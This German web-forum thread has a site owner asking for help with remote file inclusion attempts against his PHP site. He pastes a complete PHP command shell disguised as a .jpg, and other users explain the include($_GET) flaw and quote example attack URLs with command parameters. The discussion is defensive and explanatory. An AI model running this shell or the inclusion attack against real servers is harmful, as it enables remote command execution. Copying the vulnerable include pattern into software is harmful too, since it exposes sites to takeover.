+ Antworten
Seite 1 von 2 1 2 LetzteLetzte
Ergebnis 1 bis 15 von 17

Thema: Will mich da einer Hacken?

  1. #1
    TP-Senior Tetsuo ist auf einem guten Weg Avatar von Tetsuo
    Registriert seit
    Apr 2004
    Ort
    Hockenheim
    Beiträge
    182

    Angry Will mich da einer Hacken?

    Ich hab mir ein kleines Extra in mein PHP Script geschrieben das mich per Mail informiert wenn auf einer meiner Sites ins leere führt. In der Mail steht dann auf welcher Site der Link ist und wohin er füren sollte.

    Jetzt hab ich ne Mail bekommen:
    http ://ww w.meineSeite.de/index.php?page=http://nichtMeineSeite.org/lila.jpg

    Ich hab mir jetzt mal die Seite http://nichtMeineSeite.org/lila.jpg angeschaut.

    Das hier hab ich gefunden:
    PHP-Code:
    <font color="#808080"><br></font><font color="#008000"><center><b><font face="verdana" size="2">CMD</font></b> <font face="verdana" size="2"> - System CoManD<br><br></font></center></font><font face="Verdana" size="1"><font color="#008000"><br>
    <b>#</b> CMD PHP : <h1>PHP SHELL</h1><br>
    <b>#</b></b></font><br>
    <br>
    <br>
    <hr color="#000000" width=80% height=115px>
    <br>
    <div align="center">
      <table border="1" cellpadding="0" cellspacing="0" width="633" height="17" bordercolorlight="#000080" bordercolordark="#000080">
        <tr>
          <td width="633" height="17">
    <pre><font color="gray" font face="Tahoma" size="2">
    <?
      
    // CMD - To Execute Command on File Injection Bug ( gif - jpg - txt )
      
    if (isset($chdir)) @chdir($chdir);
      
    ob_start();
       
    passthru("$cmd 1> /tmp/cmdtemp 2>&1; cat /tmp/cmdtemp; rm /tmp/cmdtemp");
      
    $output ob_get_contents();
      
    ob_end_clean();
      if (!empty(
    $output)) echo str_replace(">""&gt;"str_replace("<""&lt;"$output));
    ?>
    </font></pre>
     </tr>
      </table>
    </div>

    <br>
    <hr color="#000000" width=80% height=115px>
    <p align="left">
    <br>
    <b> <font face="Verdana" size="1" color="#008000">PHP SHELL</font></b> <font face="Verdana" size="1" color="#008000"><br><b>
    #<a href="mailto:PHPSHELL@bol.com.br">Contact
          Us</font></a></b><br><font face="Verdana" size="1" color="#008000"><b>#
    :D </b>
    </font>
    Kann mir einer erklären was genau der Typ da versucht? Ich werd aus dem Script nicht ganz schlau

  2. #2
    TP-Moderator Peter ist ein richtiges Arbeitstier - DANKE Peter ist ein richtiges Arbeitstier - DANKE Peter ist ein richtiges Arbeitstier - DANKE Peter ist ein richtiges Arbeitstier - DANKE Peter ist ein richtiges Arbeitstier - DANKE Avatar von Peter
    Registriert seit
    Nov 2001
    Ort
    Vienna
    Beiträge
    3.406
    Das selbe Phänomen hab ich bei meiner Seite auch schon öfters bemerkt.

    Es handelt sich dann um
    w w w.meineseite.com/ref.php?n=http://www.aace.com/2002/photos/TNImage/tn_DSC00398.JPG.jpg?&cmd=id
    wobei ref.php normal zahlen von 1-100 enthält
    z.B. ref.php?n=45 aber nie eine url...

    Vielleicht hilft das wem zum Aufschlüsseln.

    Grüße,
    Peter
    _________-- - adicto otra vez - --
    (¯`·.¸¸.·´¯`·.¸¸..¸¸.·´¯`·.¸¸..¸¸.·´¯`·.¸¸.·`¯)
    Unterwasserrugby - der dreidimensionale Sport

  3. #3
    TP-Senior Tetsuo ist auf einem guten Weg Avatar von Tetsuo
    Registriert seit
    Apr 2004
    Ort
    Hockenheim
    Beiträge
    182
    Bei mir sehen die Links normalterweise so aus:
    http ://ww w.meineSeite.de/index.php?page=SeiteABC

    wobei SeiteABC nicht der Name einer Datei ist sondern ein Index eines Arrays .

    Ich hab mir mal die angebliche *.jpg aus deinem Link angesehen und die schaut genauso aus wie bei meinem Besucher.

    Nur wüsste ich gerne was da genau passiert. Es handelt sich um die Site eines Kunden und die würde ich gerne gegen solche Freaks schützen. Ich glaub nicht das er etwas erreicht hat, aber man kann ja nie wissen

  4. #4
    Guest Strogij hilft, wo's geht Strogij hilft, wo's geht
    Registriert seit
    Aug 2002
    Beiträge
    2.233
    Das sind (wahrscheinlich) Noobs, die versuchen deinen Server zu hacken und zwar mit dieser Möglichkeit (der Fehler könnte jedem passieren):
    PHP-Code:
    <html>
    ...
    include(
    $_GET['seite']);
    ...
    </
    html
    Wenn ich nun etwas wie skript?seite=www.andereseite.jpg eingebe (statt der gedachten Seiten, die man selbst erstellt hat) und in der .jpg der PHP-Code ist - wird es inkludiert und als PHP-Code auf deinem Server ausgeführt! Man hat dann die volle Kontrolle über den Server.

  5. #5
    TP-Senior feuervogel macht alles soweit korrekt
    Registriert seit
    Jun 2004
    Ort
    leipzig
    Beiträge
    214
    Wenn "URL fopen wrappers" in PHP aktiviert sind (in der Standardkonfiguration ist das der Fall) können Sie als Pfad der einzubindenden Datei auch eine URL (via HTTP oder anderen unterstützen Wrappern - eine Liste der unterstützen Protokolle finden Sie unter Anhang L) statt einer lokalen Pfadangabe angeben. Falls der Zielserver die Zieldatei als PHP-Code interpretiert, können Sie an die einzubindende Datei Variablen in einem Request-String übergeben, genauso wie bei HTTP GET. Streng genommen ist das nicht das Gleiche, wie diese Datei einzubinden und diesem den Geltungsbereich des Vater-Skripts zu vererben; das Skript wird auf dem Remote-Server ausgeführt und danach wird das Ergebnis in das lokale Skript eingebunden.
    dazu müsste aber url-fopen-wrappers aktiviert sein, und ich glaube nicht, dass dies auf einem halbwegs sicheren system der fall ist.
    BeCreated - Geduld und Zeit für Ihre Wünsche

  6. #6
    TP-Senior Tetsuo ist auf einem guten Weg Avatar von Tetsuo
    Registriert seit
    Apr 2004
    Ort
    Hockenheim
    Beiträge
    182
    Mir ist aber noch immer nicht ganz klar was das script eigentlich anstellt

  7. #7
    TP-Specialist Stuck Mojo ist ein richtiges Arbeitstier - DANKE Stuck Mojo ist ein richtiges Arbeitstier - DANKE Stuck Mojo ist ein richtiges Arbeitstier - DANKE Stuck Mojo ist ein richtiges Arbeitstier - DANKE Stuck Mojo ist ein richtiges Arbeitstier - DANKE Stuck Mojo ist ein richtiges Arbeitstier - DANKE Avatar von Stuck Mojo
    Registriert seit
    Feb 2001
    Ort
    Helmstedt/Wolfsburg
    Beiträge
    4.108
    Man kann sich über weitere Parameter in der Shell bewegen und beliebige Programme ausführen - die Ausgabe wird zwischengespeichert und dann im Browser ausgegeben. Steht da doch sogar drin -> "To Execute Command ..."

    Gruss
    Jan

  8. #8
    TP-Specialist mike bringt sich richtig ein Avatar von mike
    Registriert seit
    Jan 2002
    Ort
    TP/Dynamik
    Beiträge
    2.876
    wird auch hier ganz gut beschrieben:

    http://groups.google.com/groups?hl=d...D%26ie%3DUTF-8

    p.s. da findest sogar genau das script wieder -> kiddy-contest


    $cmd wär dann in dem fall mit irgendwelchen commands zum füllen gewesen (z.b. ls, ll usw) dieser output wird dann im cmdtemp - file zwischengespeichert, ausgegeben (cat) und dann spuren verwischt (rm)

    der rest läuft dann so, wie jan beschrieben hat.

    Viel dürfte dem Angreifer das nicht gebracht haben, da ich - soweit ich aus dem Code ersehen kann - solche relevante dinge wie $cmd nicht mitübergeben werden/wurden.
    Gehelft? Hier kannst du dich bedanken.

    mike

  9. #9
    TP-Moderator Peter ist ein richtiges Arbeitstier - DANKE Peter ist ein richtiges Arbeitstier - DANKE Peter ist ein richtiges Arbeitstier - DANKE Peter ist ein richtiges Arbeitstier - DANKE Peter ist ein richtiges Arbeitstier - DANKE Avatar von Peter
    Registriert seit
    Nov 2001
    Ort
    Vienna
    Beiträge
    3.406
    Habs grad bei mir mit ls ausprobiert.

    Das funktioniert super.
    _________-- - adicto otra vez - --
    (¯`·.¸¸.·´¯`·.¸¸..¸¸.·´¯`·.¸¸..¸¸.·´¯`·.¸¸.·`¯)
    Unterwasserrugby - der dreidimensionale Sport

  10. #10
    TP-Senior Tetsuo ist auf einem guten Weg Avatar von Tetsuo
    Registriert seit
    Apr 2004
    Ort
    Hockenheim
    Beiträge
    182
    Da geht noch einiges mehr... Verzeichnisse schreiben, wechseln & löschen... man muß sich kurz an das handling gewöhnen aber dann gehts wie in der linux shell, und das beste - es geht mit dem script meines Angreifers, von seinem Server aus

    zum glück geht es nicht auf meiner site

  11. #11
    TP-Moderator Peter ist ein richtiges Arbeitstier - DANKE Peter ist ein richtiges Arbeitstier - DANKE Peter ist ein richtiges Arbeitstier - DANKE Peter ist ein richtiges Arbeitstier - DANKE Peter ist ein richtiges Arbeitstier - DANKE Avatar von Peter
    Registriert seit
    Nov 2001
    Ort
    Vienna
    Beiträge
    3.406
    Zitat Zitat von Tetsuo
    Da geht noch einiges mehr... Verzeichnisse schreiben, wechseln & löschen... man muß sich kurz an das handling gewöhnen aber dann gehts wie in der linux shell, und das beste - es geht mit dem script meines Angreifers, von seinem Server aus

    zum glück geht es nicht auf meiner site
    Aber bei seinem Script hat doch $cmd keinen Wert?!
    _________-- - adicto otra vez - --
    (¯`·.¸¸.·´¯`·.¸¸..¸¸.·´¯`·.¸¸..¸¸.·´¯`·.¸¸.·`¯)
    Unterwasserrugby - der dreidimensionale Sport

  12. #12
    TP-Senior Tetsuo ist auf einem guten Weg Avatar von Tetsuo
    Registriert seit
    Apr 2004
    Ort
    Hockenheim
    Beiträge
    182
    Den übergibst du ja auch dynamisch... wär ja auch blöd wenn du für jeden befehl das script neu speichen müßtest

    http ://ww w.meineSeite.de/index.php?age=http://nichtMeineSeite.org/lila.jpg&cms=mkdir test

    mein besucher versuchte es heute schon zum 4 mal. Ich hab das script jetzt so umgeschrieben das es ihn beim nächsten mal begrüßt und ihm seine IP ausgibt, mit dem kleinen hinweis dass es jetzt doch einmal zu oft war

  13. #13
    TP-Moderator Peter ist ein richtiges Arbeitstier - DANKE Peter ist ein richtiges Arbeitstier - DANKE Peter ist ein richtiges Arbeitstier - DANKE Peter ist ein richtiges Arbeitstier - DANKE Peter ist ein richtiges Arbeitstier - DANKE Avatar von Peter
    Registriert seit
    Nov 2001
    Ort
    Vienna
    Beiträge
    3.406
    Gute Idee.

    Ich hab bei mir jetzt auch sowas eingebaut.
    Geändert von Peter (29.07.2004 um 23:37 Uhr)
    _________-- - adicto otra vez - --
    (¯`·.¸¸.·´¯`·.¸¸..¸¸.·´¯`·.¸¸..¸¸.·´¯`·.¸¸.·`¯)
    Unterwasserrugby - der dreidimensionale Sport

  14. #14
    TP-Urgestein webcreate ist einer der Eckpfeiler des TP - ohne ihn geht nichts webcreate ist einer der Eckpfeiler des TP - ohne ihn geht nichts webcreate ist einer der Eckpfeiler des TP - ohne ihn geht nichts webcreate ist einer der Eckpfeiler des TP - ohne ihn geht nichts webcreate ist einer der Eckpfeiler des TP - ohne ihn geht nichts webcreate ist einer der Eckpfeiler des TP - ohne ihn geht nichts webcreate ist einer der Eckpfeiler des TP - ohne ihn geht nichts webcreate ist einer der Eckpfeiler des TP - ohne ihn geht nichts webcreate ist einer der Eckpfeiler des TP - ohne ihn geht nichts webcreate ist einer der Eckpfeiler des TP - ohne ihn geht nichts webcreate ist einer der Eckpfeiler des TP - ohne ihn geht nichts Avatar von webcreate
    Registriert seit
    Nov 2003
    Ort
    NRW
    Beiträge
    11.634
    Sicherlich eine Sicherheitslücke, die aber schnell geschlossen werden kann.
    Aber zum erstellen von Verzeichnissen, löschen, verschieben, usw.
    Da sehe ich doch meine Probleme.
    Wer den Apache als root laufen lässt muss sich nicht wundern, das sein System gehackt wird.
    Als www-data kann er auf einem logisch geführtem System eigentlich nicht viel anrichten.
    Es mag zur Informationsbeschaffung und zum Aufsuchen von offenen Port usw nutzen, aber das war es dann schon.
    Gruß Mark

    webcreate IT SOLUTIONS
    www.webcreate-nrw.de

    Photoblog....|....flickr

  15. #15
    TP-Senior Tetsuo ist auf einem guten Weg Avatar von Tetsuo
    Registriert seit
    Apr 2004
    Ort
    Hockenheim
    Beiträge
    182
    Jetzt läuft mein Script schon seit einigen Tagen uns speichert fleißig die IP nummern der Penner die versuchen mich zu hacken in einer Datenbank.

    Es ist schon erschreckend was im netz so alles los ist . Alleine heute (stand 21:45 Uhr) haben es vier verschiedene Angreifer versucht.

    Was kann man da machen , ich hab ihre IP nummern und hab auch noch ein Cookie auf ihrem Rechner hinterlassen. Den Versuch kann ich also beweisen.

+ Antworten
Seite 1 von 2 1 2 LetzteLetzte

Aktive Benutzer

Aktive Benutzer

Aktive Benutzer in diesem Thema: 1 (Registrierte Benutzer: 0, Gäste: 1)

     

Ähnliche Themen

  1. Bildergalerie, tumbs und bilder auf einer seite
    Von klombert im Forum Traum-Dynamik
    Antworten: 6
    Letzter Beitrag: 05.06.2003, 18:57
  2. iFrames in einer Tabelle ... wie genau ?
    Von Jannefant im Forum HTML & CSS
    Antworten: 9
    Letzter Beitrag: 26.05.2002, 04:07
  3. weiterleitung innerhalb einer html-seite...
    Von Hol-G im Forum Dreamweaver & andere Webeditoren
    Antworten: 4
    Letzter Beitrag: 30.04.2002, 15:12
  4. Photocase lässt mich nich...
    Von Charlie im Forum Einfach so ...
    Antworten: 12
    Letzter Beitrag: 17.04.2002, 16:41

Berechtigungen

  • Neue Themen erstellen: Nein
  • Themen beantworten: Nein
  • Anhänge hochladen: Nein
  • Beiträge bearbeiten: Nein

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51